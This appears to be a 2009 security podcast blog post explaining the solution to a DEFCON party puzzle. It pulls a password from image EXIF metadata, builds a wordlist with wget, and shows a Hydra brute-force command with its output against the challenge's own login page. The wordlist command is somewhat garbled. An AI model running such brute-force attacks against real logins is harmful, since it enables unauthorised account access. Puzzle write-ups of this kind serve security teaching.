Remember the original post? Here is the challenge in case you forgot.
As stated in the original post, everything that you needed to complete the challenge was in the posting. If you listen to our show, all of the tools you need to complete it were also discussed in previous episodes and technical segments! Of course, knowing our recent projects and humor makes it all that much easier.
Enter document metadata. Remember that nice badge picture?

exiftool -r -a -u -g1 party_badge.jpg
exiftool party_badge.jpg
ExifTool Version Number : 7.23 File Name : party_badge.jpg File Size : 189 kB File Modification Date/Time : 2009:08:07 10:40:07 File Type : JPEG MIME Type : image/jpeg JFIF Version : 1.2 Exif Byte Order : Big-endian (Motorola, MM) Image Description : https://www.captainmetadata.com Camera Model Name : https://www.freelarrypesce.com X Resolution : 100 Y Resolution : 100 User Comment : https://www.defconpartychallenge.com Flashpix Version : 0100 Color Space : Uncalibrated GPS Version ID : 2.2.0.0 GPS Latitude : 413551403 deg 0' 0.00" GPS Longitude : 413551403 deg 0' 0.00" GPS Map Datum : 0413551403 Quality : 100% Image Size : 553x465 GPS Position : 413551403 deg 0' 0.00", 413551403 deg 0' 0.00"
https://www.defconpartychallenge.com: We are presented with a pop up requiring authentication via username and password. Hmmm. Let’s move on for a bit.
https://www.freelarrypesce.com: A Clue!
Need a password? It is the unique number from Larry's RFID implant. There are multiple ways to obtain it, but here are a few suggestions. 1. Find it mentioned somewhere. 2. Ask someone other than the PDC crew if they know it. 3. As a last result, ask to read Larry's RFID tag at DEFCON (EM4x05 series tag, and if asked, he'll let you) 4. Re-read the blog post.
Wow, that was hard. Downloading and watching all those videos. But, wait Larry, you told me everything I needed was in the blog post!
It was.
Look at the image again with exiftool. See these funny numbers?
GPS Version ID : 2.2.0.0 GPS Latitude : 413551403 deg 0' 0.00" GPS Longitude : 413551403 deg 0' 0.00" GPS Map Datum : 0413551403
So, there is the password: 0413551403
Yes, the password is in the image metadata several times, but most of them without the leading zero! Yeah, I got lazy, and just started pumping the number in to various interesting fields, until one kept the leading zero…
On to our next clue.
https://www.captainmetadata.com/
Need a username? Like we told you, EVERYTHING you needed was in the blog post.
wget -r -l 1 https://secweekly2.wpengine.com/2009/07/09/the-security-weeklyi-hacked-defcon/ | grep -hr "" securityweekly.com/ | tr '[:space:]' 'n' |
sort | uniq > wordlist.lst | egrep -v '(','|';'|'}'|'{'|'<'|'>'|':'|'='|'"'|'/'|'/'|'['|']')' wordlist.lst | sort -u
> wordlist.clean.lstNote that we did not use john the ripper to add additional passwords to the list as we did in Episode 129. Technically it wouldn’t hurt, but the word was already in the page, no additional words needed.
Now that we have a wordlist and a password, we can brute force the login with Hyrda, which we mentioned in the White Hat World’s Best Of Network Penetration Testing Tools:
hydra -s 80 -L wordlist.clean.lst -p 0413551403 -t 36 defconpartychallenge.com http-head /index.html
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (https://www.thc.org) starting at 2009-08-07 13:25:44 [DATA] 36 tasks, 1 servers, 2249 login tries (l:2249/p:1), ~62 tries per task [DATA] attacking service http-head on port 80 [80][www] host: 66.203.130.200 login: strippers password: 0413551403 [STATUS] attack finished for defconpartychallenge.com (waiting for childs to finish) Hydra (https://www.thc.org) finished at 2009-08-07 13:25:52

I hope you all enjoyed the challenge, even if you weren’t going to DEFCON, or didn’t get to complete it. We know a lot of you want Security Weekly baubles so we are attempting to run another batch of “party badges” that we can exchange for a modest fee (to cover materials and postage). Stay tuned!
– Larry “haxorthematrx” Pesce